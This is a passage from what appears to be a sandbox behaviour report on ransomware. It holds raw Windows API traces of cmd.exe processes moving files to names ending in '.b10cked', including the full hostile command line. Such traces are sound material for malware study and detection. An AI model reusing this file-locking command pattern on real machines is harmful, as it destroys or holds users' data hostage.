returned 1 [0202.143] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf6b4 | out: lpFindFileData=0x2cf6b4) returned 0x3c0010 [0202.143] FindClose (in: hFindFile=0x3c0010 | out: hFindFile=0x3c0010) returned 1 [0202.143] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf6b4 | out: lpFindFileData=0x2cf6b4) returned 0x3c0010 [0202.143] FindClose (in: hFindFile=0x3c0010 | out: hFindFile=0x3c0010) returned 1 [0202.143] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.143] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.143] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.143] GetEnvironmentStringsW () returned 0x3c2af0* [0202.143] FreeEnvironmentStringsW (penv=0x3c2af0) returned 1 [0202.143] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.144] GetConsoleOutputCP () returned 0x1b5 [0202.144] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.144] GetUserDefaultLCID () returned 0x409 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfa78, cchData=128 | out: lpLCData="0") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfa78, cchData=128 | out: lpLCData="0") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfa78, cchData=128 | out: lpLCData="1") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.144] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.145] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.145] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.146] GetConsoleTitleW (in: lpConsoleTitle=0x3b08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.146] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.146] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.146] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.146] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.147] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.147] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.147] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.147] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.147] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.147] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.149] GetConsoleTitleW (in: lpConsoleTitle=0x2cf770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.149] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.149] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.149] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.150] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.150] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.150] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.150] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.150] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.150] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.150] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.150] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.150] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.150] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.150] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.150] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.150] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.150] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.150] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.150] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.150] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.150] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.150] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.150] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.150] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.150] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.151] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.152] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.152] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf52c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf524, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf524*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.152] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.153] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.153] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.153] _wcsicmp (_String1="MSMSTO~1.HXN", _String2=".") returned 63 [0202.153] _wcsicmp (_String1="MSMSTO~1.HXN", _String2="..") returned 63 [0202.153] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsto~1.hxn")) returned 0x2022 [0202.153] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.153] SetErrorMode (uMode=0x0) returned 0x0 [0202.153] SetErrorMode (uMode=0x1) returned 0x0 [0202.153] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", nBufferLength=0x104, lpBuffer=0x2ceeb4, lpFilePart=0x2cee9c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", lpFilePart=0x2cee9c*="MSMSTO~1.HXN") returned 0x27 [0202.153] SetErrorMode (uMode=0x0) returned 0x1 [0202.153] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.154] _wcsicmp (_String1="MSMSTO~1.HXN", _String2=".") returned 63 [0202.154] _wcsicmp (_String1="MSMSTO~1.HXN", _String2="..") returned 63 [0202.154] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsto~1.hxn")) returned 0x2022 [0202.154] SetErrorMode (uMode=0x0) returned 0x0 [0202.154] SetErrorMode (uMode=0x1) returned 0x0 [0202.154] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", nBufferLength=0x104, lpBuffer=0x2cf330, lpFilePart=0x2cf0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", lpFilePart=0x2cf0c8*="MSMSTO~1.HXN") returned 0x27 [0202.154] SetErrorMode (uMode=0x0) returned 0x1 [0202.154] SetErrorMode (uMode=0x0) returned 0x0 [0202.154] SetErrorMode (uMode=0x1) returned 0x0 [0202.154] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2cf538, lpFilePart=0x2cf0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked", lpFilePart=0x2cf0c8*="MS.MSTORE.14.1033.hxn.b10cked") returned 0x38 [0202.154] SetErrorMode (uMode=0x0) returned 0x1 [0202.154] SetLastError (dwErrCode=0x0) [0202.154] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.mstore.14.1033.hxn.b10cked")) returned 0xffffffff [0202.154] GetLastError () returned 0x2 [0202.154] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2cea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cea44) returned 0x3b0e70 [0202.154] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x2cea44 | out: lpFindFileData=0x2cea44) returned 0 [0202.155] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.155] GetLastError () returned 0x12 [0202.155] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2cea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cea44) returned 0x3b0e70 [0202.155] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x2cea44 | out: lpFindFileData=0x2cea44) returned 0 [0202.155] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.155] GetLastError () returned 0x12 [0202.156] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be0) returned 0x3b0e70 [0202.156] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x3c1be0 | out: lpFindFileData=0x3c1be0) returned 0 [0202.156] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.156] GetLastError () returned 0x12 [0202.156] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be0) returned 0x3b0e70 [0202.156] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x3c1be0 | out: lpFindFileData=0x3c1be0) returned 0 [0202.156] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.156] GetLastError () returned 0x12 [0202.156] _get_osfhandle (_FileHandle=2) returned 0xb [0202.156] GetFileType (hFile=0xb) returned 0x2 [0202.575] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2cec14 | out: lpMode=0x2cec14) returned 1 [0202.575] _get_osfhandle (_FileHandle=2) returned 0xb [0202.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2cec48 | out: lpConsoleScreenBufferInfo=0x2cec48) returned 1 [0202.575] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.577] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cec88 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.577] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2cec6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cec6c*=0x2c) returned 1 [0202.577] longjmp () [0202.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.577] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.577] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.577] SetConsoleInputExeNameW () returned 0x1 [0202.577] GetConsoleOutputCP () returned 0x1b5 [0202.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.578] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.578] exit (_Code=1) Process: id = "470" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x6fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29286 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29287 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29288 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29289 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29290 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29291 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29292 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29293 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29294 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29295 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30150 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30151 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30152 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 30153 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 30154 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30155 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30156 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30157 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30158 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30159 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30160 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30161 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30162 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30163 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30164 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30165 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30166 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 30167 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 30168 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 30169 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 30170 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 30171 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 30172 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 30269 start_va = 0x1290000 end_va = 0x134ffff entry_point = 0x1290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 667 os_tid = 0xdcc [0204.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc1c | out: lpSystemTimeAsFileTime=0x12fc1c*(dwLowDateTime=0xae8b7220, dwHighDateTime=0x1d440a9)) [0204.238] GetCurrentProcessId () returned 0x6fc [0204.238] GetCurrentThreadId () returned 0xdcc [0204.238] GetTickCount () returned 0x39923 [0204.238] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc14 | out: lpPerformanceCount=0x12fc14*=26102754547) returned 1 [0204.239] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.239] __set_app_type (_Type=0x1) [0204.239] __p__fmode () returned 0x76b331f4 [0204.239] __p__commode () returned 0x76b331fc [0204.239] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.239] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.240] GetCurrentThreadId () returned 0xdcc [0204.240] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdcc) returned 0x38 [0204.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.240] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.240] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.240] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fbac | out: phkResult=0x12fbac*=0x0) returned 0x2 [0204.240] VirtualQuery (in: lpAddress=0x12fbe3, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.240] GetConsoleOutputCP () returned 0x1b5 [0204.241] GetCPInfo (in: 